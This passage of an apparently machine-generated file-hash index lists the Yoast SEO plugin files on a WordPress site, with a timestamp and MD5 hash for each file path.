.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Task\\/Interface.php\":{\"d\":1545638232,\"h\":\"6484e6a323c27ea64d94411952c644a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Exception.php\":{\"d\":1545638232,\"h\":\"2e2d3c7138bb5a0926c7908ee3ae802c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/FrameworkRunner.php\":{\"d\":1545638232,\"h\":\"53a8e8cf61e97aaed8f505070f61c0bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Task\\/Hello\\/World.php\":{\"d\":1545638232,\"h\":\"dea7bea9305213c85a5e959717fc51d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Task\\/Db\\/Status.php\":{\"d\":1545638232,\"h\":\"d366ab822f6ccb228f1ec281021e147d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Task\\/Db\\/Schema.php\":{\"d\":1545638232,\"h\":\"ca65cd810dce90fb75197bf93b222896\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Task\\/Db\\/Generate.php\":{\"d\":1545638232,\"h\":\"8e99760ca8f153ce4fcaeafb8bfd2474\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Task\\/Db\\/Version.php\":{\"d\":1545638232,\"h\":\"e11b7c22f1eabea4a90fe24639edc536\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Task\\/Db\\/Migrate.php\":{\"d\":1545638232,\"h\":\"92060289485b8909b08e7b2a189ef3d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Task\\/Db\\/Setup.php\":{\"d\":1545638232,\"h\":\"79d66f04c0dd28cc0537c09026bb75d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/version.php\":{\"d\":1545638232,\"h\":\"7105171b5fcb7118deb8c73210fc4cd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/select2\\/select2.min.css\":{\"d\":1545638232,\"h\":\"d44571114a90b9226cd654d3c7d9442c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/metabox-primary-category-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"90a882f167675817c8dbae0f574937cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/filter-explanation-930.min.css\":{\"d\":1545638232,\"h\":\"c19cd8f1682f03b68251bb6af9d9ae7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/structured-data-blocks-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"d0eb267c777508e2e438d156a4106313\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/adminbar-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"89b047147d56c9696a3effae99ffcdf5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/inside-editor-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"6c6dec85b4b7d55e86032e928dc35a5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/dashboard-930.min.css\":{\"d\":1545638232,\"h\":\"0413bad088582bb2dc4b45aa29cefe2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/metabox-primary-category-930.min.css\":{\"d\":1545638232,\"h\":\"9c58c585b61d69c31aa561c19c0c760a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yoast-extensions-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"3be69be7b0b24810076fdba5272cb50a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yoast-components-930.min.css\":{\"d\":1545638232,\"h\":\"a0f06abb8ddab62e9b11d93c75e44db5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/featured-image-930.min.css\":{\"d\":1545638232,\"h\":\"5e992ed3094ebd7c38cccd621118cce8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yoast-extensions-930.min.css\":{\"d\":1545638232,\"h\":\"23ae678ee8fec7115c19a10ae598790c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/alerts-930.min.css\":{\"d\":1545638232,\"h\":\"2ef15bde0d782e87de8b2d37a564ce35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/admin-global-930.min.css\":{\"d\":1545638232,\"h\":\"90fafae0ad3467e207692897876b50f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/toggle-switch-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"6b4c29cd8675a705bb9d23674f9b62e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/structured-data-blocks-930.min.css\":{\"d\":1545638232,\"h\":\"8e6b9564f386144d7f960dff5cdb6f5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/search-appearance-930.min.css\":{\"d\":1545638232,\"h\":\"5e82cade587100e57c8b8c80f00b2815\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yst_plugin_tools-930.min.css\":{\"d\":1545638232,\"h\":\"e85150c27419011bb8d6e6e93988e0f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/metabox-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"b264d1f82aeb65ac4b8e1c9d67d810cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/wpseo-dismissible-930.min.css\":{\"d\":1545638232,\"h\":\"90afa8a13c47e57c7d28c60ce74476ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/edit-page-930.min.css\":{\"d\":1545638232,\"h\":\"b594f46b243270ccd969f77a2e2251db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yst_seo_score-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"0575670c2a53333f4605e7c1f99fd7f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yst_plugin_tools-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"2aa8838ce793df15305ccb6ed39f613a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/adminbar-930.min.css\":{\"d\":1545638232,\"h\":\"859f8c8a60bcf50ef8b5bf7a22ad4d87\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/metabox-930.min.css\":{\"d\":1545638232,\"h\":\"a44bbf764dc50aa0afd3663b2733a10c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/edit-page-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"2de5dd253f4d87e7a8f89866259abc7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/wpseo-dismissible-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"aa8fa2d3c479de92bf3b227a86f4aa07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/inside-editor-930.min.css\":{\"d\":1545638232,\"h\":\"6c6dec85b4b7d55e86032e928dc35a5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/search-appearance-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"2a68b84aab9f2d751ce754c534852fab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/alerts-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"1ee787fa3526af5bad8113645082b954\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yst_seo_score-930.min.css\":{\"d\":1545638232,\"h\":\"2ddcd92b3f9cef60834ba33d8ed28ea0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/featured-image-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"5e992ed3094ebd7c38cccd621118cce8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/filter-explanation-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"c19cd8f1682f03b68251bb6af9d9ae7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/dashboard-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"468e1a461a246a1b882b6af116d9851e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/admin-global-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"762c8bc61c8f1bb56aedd0aaea663ef7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/yoast-components-930-rtl.min.css\":{\"d\":1545638232,\"h\":\"3ff8ca30db39be334793319511d6b2c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/dist\\/toggle-switch-930.min.css\":{\"d\":1545638232,\"h\":\"ebec7be0b9e55f0c2674f5aa15c7156d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/css\\/main-sitemap.xsl\":{\"d\":1545638232,\"h\":\"518197e52a43ff3bc9f963585b4d33c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-ja.json\":{\"d\":1545638232,\"h\":\"a283e3b4e3741ab37e5f51b54ac5849a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-sk_SK.json\":{\"d\":1545638232,\"h\":\"a4a5e6f9d765529075e643d7943bc29f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-hr.json\":{\"d\":1545638232,\"h\":\"ffc11a034e2f710254c61c3ecccf44c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-de_CH.json\":{\"d\":1545638232,\"h\":\"2dc15b51b7a73c86b04c51d0704e3b53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-tr_TR.json\":{\"d\":1545638232,\"h\":\"7f1a5204cfc20fa43c49c26c2b3a90d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-it_IT.json\":{\"d\":1545638232,\"h\":\"bc5977a05fb8b942ce30707b0f2ed860\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-he_IL.json\":{\"d\":1545638232,\"h\":\"56b9ba7f547304b2765cc59dba0c90ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-sv_SE.json\":{\"d\":1545638232,\"h\":\"92f5b4a382a0ffe51256ef2ce44847fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-zh_HK.json\":{\"d\":1545638232,\"h\":\"5ead9912958596ee626e34eba9170211\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-pl_PL.json\":{\"d\":1545638232,\"h\":\"a5fc8f1a786a25066eee55b52399d45a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-nb_NO.json\":{\"d\":1545638232,\"h\":\"c62aed8d6d293850a7c8c859de64c2bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-it_IT.json\":{\"d\":1545638232,\"h\":\"b875d2c52b36da267510115a0e6aed0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-sr_RS.json\":{\"d\":1545638232,\"h\":\"ebc1f0aac903a4f30d0a1c5af58982f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-es_ES.json\":{\"d\":1545638232,\"h\":\"84088831725da830f893091f8dc5004e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-en_NZ.json\":{\"d\":1545638232,\"h\":\"3a965cb0faabfcfb77dfd3b237f14059\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-ro_RO.json\":{\"d\":1545638232,\"h\":\"76d5a8199f9c680f4527e1e4d462d3d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-gl_ES.json\":{\"d\":1545638232,\"h\":\"b428a7f9027f1c58de2ba39c86340e3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-nl_NL.json\":{\"d\":1545638232,\"h\":\"861ea26473e9cb587063957614656a2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-fa_IR.json\":{\"d\":1545638232,\"h\":\"30bb9eb5b95ded94b2b1ef1d468ced11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-es_MX.json\":{\"d\":1545638232,\"h\":\"fff6fa57200cc2a100a36bf268284288\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-pt_BR.json\":{\"d\":1545638232,\"h\":\"985b1f051416507f0764148412a154fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-zh_TW.json\":{\"d\":1545638232,\"h\":\"27e610333dce30ba4b4c7f635f92be8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-vi.json\":{\"d\":1545638232,\"h\":\"a35dd441a9be861d5f440180bc1628b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-ja.json\":{\"d\":1545638232,\"h\":\"2f4c2ff235c83bbcffdf1898a428b324\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-nl_NL.json\":{\"d\":1545638232,\"h\":\"d64f8117fb936d770fe302e6e2f3e66b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-pt_PT.json\":{\"d\":1545638232,\"h\":\"d89e7bfce218a1423a7a58e5e213ffa3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-pt_PT.json\":{\"d\":1545638232,\"h\":\"6ec8a72ee34a23a9b49f3c1a24ccf3ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-ru_RU.json\":{\"d\":1545638232,\"h\":\"29f29c0b068ed16720118b9975c0afbe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-hu_HU.json\":{\"d\":1545638232,\"h\":\"ecdfc1e47909a4944a39b6a1489e7455\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-el.json\":{\"d\":1545638232,\"h\":\"add79c7671a6b41b12026976009851fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-zh_HK.json\":{\"d\":1545638232,\"h\":\"e90d6d4740c8cacccbbce78573827ece\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-nl_BE.json\":{\"d\":1545638232,\"h\":\"02e30d4f3d5d6fbb958b8188b75d693b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-hr.json\":{\"d\":1545638232,\"h\":\"f0c29960a709bb104f319305e2eb77c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-nl_BE.json\":{\"d\":1545638232,\"h\":\"16b0ccd2a370142666159e9c26c18104\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-hu_HU.json\":{\"d\":1545638232,\"h\":\"8e1436df0b59de5a1366b9dbc03ef4c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-ro_RO.json\":{\"d\":1545638232,\"h\":\"05a5c97228df70830d9e588ede0e081e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-ru_RU.json\":{\"d\":1545638232,\"h\":\"bb6fa756265f5f8ecc9ac0359c8e0052\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-sr_RS.json\":{\"d\":1545638232,\"h\":\"164d500796bf9317fea5e093c5944c7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-es_AR.json\":{\"d\":1545638232,\"h\":\"5dc3c9764ba215bbdca3cedb8a768d24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-es_MX.json\":{\"d\":1545638232,\"h\":\"199195ffc1a4217c94fe0d0a5bc9f3d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-cs_CZ.json\":{\"d\":1545638232,\"h\":\"44f5356180267adb051499f827046356\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-fi.json\":{\"d\":1545638232,\"h\":\"6fe5cf3204acd52b19b16e20803c59af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-sv_SE.json\":{\"d\":1545638232,\"h\":\"718ae459d984d19517f891ce81ec8a08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs.json\":{\"d\":1545638232,\"h\":\"43e518fa5e6de0ad0cfe1d19ed63de7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-pt_BR.json\":{\"d\":1545638232,\"h\":\"0a98977b92173544e3fa60de842e410d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-es_VE.json\":{\"d\":1545638232,\"h\":\"b2d2f5a9422bd802db265428b616e575\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-de_DE.json\":{\"d\":1545638232,\"h\":\"448fe8f118477556cf88cd2d75910188\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-de_CH.json\":{\"d\":1545638232,\"h\":\"25de3770467885867dfa54da3435e86c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-tr_TR.json\":{\"d\":1545638232,\"h\":\"9dee5faa4af8580e22590303b9e74702\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-en_CA.json\":{\"d\":1545638232,\"h\":\"cd55c7fbdb6b68c3aa37e936eb6a4c10\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-seo-js.json\":{\"d\":1545638232,\"h\":\"1226ab09757e1b0a5c50780006aa7e29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-nl_BE.json\":{\"d\":1545638232,\"h\":\"f714f41d140e0fe178a565aff7a22686\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-seo-js.php\":{\"d\":1545638232,\"h\":\"2948d3f79d26f8555770b7638ad696e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-pt_PT.json\":{\"d\":1545638232,\"h\":\"23377740f066a506cc7be772bc4ee9f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs.php\":{\"d\":1545638232,\"h\":\"579e8a4ecb05bd3c22bd5ea9a0cf7bba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-nl_NL.json\":{\"d\":1545638232,\"h\":\"7e93d65fa4d1ba32d764b10a4c7222ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-es_VE.json\":{\"d\":1545638232,\"h\":\"d8912235096ac520357e73b01852d85e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-sv_SE.json\":{\"d\":1545638232,\"h\":\"bb8fa6438a07b1c5f98ce951b93ba268\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-zh_TW.json\":{\"d\":1545638232,\"h\":\"33ba3d9fb0ae3590f9c48505ac26f6b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-uk.json\":{\"d\":1545638232,\"h\":\"57800785f4974195d00235fd51bb94df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-cs_CZ.json\":{\"d\":1545638232,\"h\":\"e45631e6c9150b87d8dad83c86d5527b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-ca.json\":{\"d\":1545638232,\"h\":\"5cf4222adb09b1eacb2a27841a2bbc21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-es_ES.json\":{\"d\":1545638232,\"h\":\"acc5c3becfea209c55c02dff759a81de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-zh_TW.json\":{\"d\":1545638232,\"h\":\"cd76e9c874a7b789c1d1a343712d67ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-ja.json\":{\"d\":1545638232,\"h\":\"7fb766d645b63e0026465d8db51f386f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-en_NZ.json\":{\"d\":1545638232,\"h\":\"501cd1e1666c2c3ed48612267aadcb6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-bg_BG.json\":{\"d\":1545638232,\"h\":\"cb558d7b68b1f5311299c90b7222bc12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-en_GB.json\":{\"d\":1545638232,\"h\":\"76380a1c1d7a233d930e72d92e835b0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-zh_CN.json\":{\"d\":1545638232,\"h\":\"b36397ef5e5a46b5950bfab6f6585368\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-fi.json\":{\"d\":1545638232,\"h\":\"236ebc3d652a7fe010a4a3d4d7c9b26b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-de_DE.json\":{\"d\":1545638232,\"h\":\"708e41352010e2cfda2ec106eef08f93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-he_IL.json\":{\"d\":1545638232,\"h\":\"41be720a3a151ddea150cdfcaf569e87\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-fr_FR.json\":{\"d\":1545638232,\"h\":\"3424788d369996460f12fab90f89c5b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-de_CH.json\":{\"d\":1545638232,\"h\":\"a8603b023542123ff5065c42b1a35164\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpr